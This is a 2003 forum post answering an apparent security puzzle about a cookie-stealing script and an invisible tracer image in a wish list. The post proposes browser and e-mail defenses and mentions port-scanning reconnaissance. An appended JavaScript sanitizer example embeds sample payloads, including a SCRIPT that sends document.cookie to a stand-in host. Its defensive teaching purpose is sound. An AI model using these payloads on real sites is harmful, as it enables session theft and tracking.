Message 11 of 16
My Answer - Don't Read If You Haven't Sent Yours In!
Ok, here is my e-mail to Ed on this.
==============
1) The .JPG is being used as a tracer. The "child" is the owner of the bumblesnowmonster.com website (or he r00ted it, but that is another story!) and he can check the website usage logs. He posted an IMG image link, so that anyone who reads that link from an HTML-enabled program (like a web browser, e-mail client, and/or Santa's inhouse application), will actually call that .JPG file from the www.bumblesnowmonster.com web server. And giving the Height and Width a 0 means the picture would be, in effect, invisible. But, for the owner of the bumblesnowmonster.com web server, in their server logs, they would have the IP address of the machine that read the "child's" wish list. That public IP would then be used as the place to attack! Obviously, the "child" only wants the IP addresses for Santa and his elves, so as to attack their machines to try and get into them to change their status from Bad to Good. So, the first thing you need to do is reconnaissance. Find out what IP range Santa has, to then probe for machines that could be attacked to gain access to the internal DB. Start port scanning the IPs you get for open ports to then try and exploit.
2) I am not a programmer, so I don't quite know the reason for the 2nd attack, but I will guess here. Document.location says that this is where the .CGI file is located, again at the www.bumblesnowmonster.com domain. And document.cookie says that this file is a cookie file, the kind of file that stores username, date, time, domain, website hit count, password, and many other personal items on the user machine. So, I guess that this SCRIPT command is pulling the GRAB.CGI file, and probably querying the elf workstation for the information in the CGI file. Maybe it is trying to get the logged on username of the elf, and their OS version, and browser version. Now, normally cookies are stored on the user workstation, not on the server (only in server memory, not physically written), so I don't understand why this would be good for the "child" to have the elves trigger the .CGI file. Maybe the cookie file that will be written will be put on the web server instead of the elf workstation. If so, then the "child" could have all kinds of useful hacking information. But like I said, I am not sure if a cookie can work in reverse like this.
3) Altering the web application: 1 - by using some form validation to not allow hypertext tags and/or script commands like <SCRIPT> or or . 2 - make sure that local scripts on the website cannot be exploited and that their security is correct and not lax, like disabling FrontPage extensions (in case Santa had them put on by accident!) Altering the elf browsers: 1 - change the ActiveX scripting permissions, setting them on Prompt to run, not on the default Enabled. Same for Java Scripting. Make them ask you to run; don't let them run by default. That way, if something strange pops up asking you to let the script run, you can click No to prevent it. 2 - Set the Internet Security Zone settings to High, instead of the Medium that it is on by default. High zone does not let scripts run at all; I don't even think they can ask you to run if you set the zone to High for the Internet zone. That would just not let any scripts like these run at all.
4) E-mail configuration: 1 - set the e-mail clients to read e-mail in Plain Text only, not HTML formatted text. With a plain text e-mail client, you would read the HTML commands, not just the results of HTML. This way, you would open an e-mail, see all of the HTML formatting, and it would NOT run. It would all just be harmless text, like when we read the 2 commands on the Techrepublic.com web page. They did not harm us. 2 - go to the Secure Content section in Outlook (if the elves use Outlook to read their e-mail), click the Internet zone, and click the Zone Settings button, then change the Security level to High. This is the same as the 2nd option for the elves' browser windows. Set the security to High so scripts cannot run. So, if the e-mail client still was able to display HTML-formatted e-mail, this way the scripts from the Internet zone could not launch.
Posted by Joseph Moore
9th Dec 2003
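The form validation suggested in point 3 of the post above, as an added example that is not part of the original post or the challenge: a wish-list submission is rejected if it carries tags the site never needs, and whatever is accepted is HTML-escaped so an elf's browser or mail client shows the markup as plain text instead of executing it (the same effect the post describes for plain-text e-mail). The sample inputs, the tag list and the function names are constructed for this example.

```javascript
// Added example (not from the original post): server-side handling of a
// submitted wish list so that embedded HTML never reaches an elf's browser
// as live markup. Two layers: reject submissions containing tags a wish list
// has no use for, and HTML-escape everything that is stored or displayed.

// Tags that should never appear in free-text wish-list input (constructed list).
const FORBIDDEN_TAG_RE = /<\s*\/?\s*(script|img|iframe|object|embed|link|meta)\b/i;

// Returns true if the text contains one of the forbidden tags.
function containsForbiddenTag(text) {
  return FORBIDDEN_TAG_RE.test(text);
}

// Escapes the five characters that let text break out into markup, so the
// browser renders "<SCRIPT>" as the literal text &lt;SCRIPT&gt;.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Validates and escapes one submission.
// Returns { ok: true, html } for accepted text, { ok: false, reason } otherwise.
function sanitizeWishList(text) {
  if (containsForbiddenTag(text)) {
    return { ok: false, reason: 'HTML tags are not allowed in a wish list' };
  }
  return { ok: true, html: escapeHtml(text) };
}

// Constructed sample submissions modelled on the two tricks the post discusses:
// a zero-size tracer image and a script that sends document.cookie to grab.cgi.
const TRACER_SAMPLE =
  'I want a bike <IMG SRC="http://www.bumblesnowmonster.com/bumble.jpg" WIDTH=0 HEIGHT=0>';
const GRABBER_SAMPLE =
  'a pony <SCRIPT>document.location="http://www.bumblesnowmonster.com/grab.cgi?"+document.cookie</SCRIPT>';
const HONEST_SAMPLE = 'Trains & a "red" sled';

for (const sample of [TRACER_SAMPLE, GRABBER_SAMPLE, HONEST_SAMPLE]) {
  console.log(JSON.stringify(sanitizeWishList(sample)));
}
```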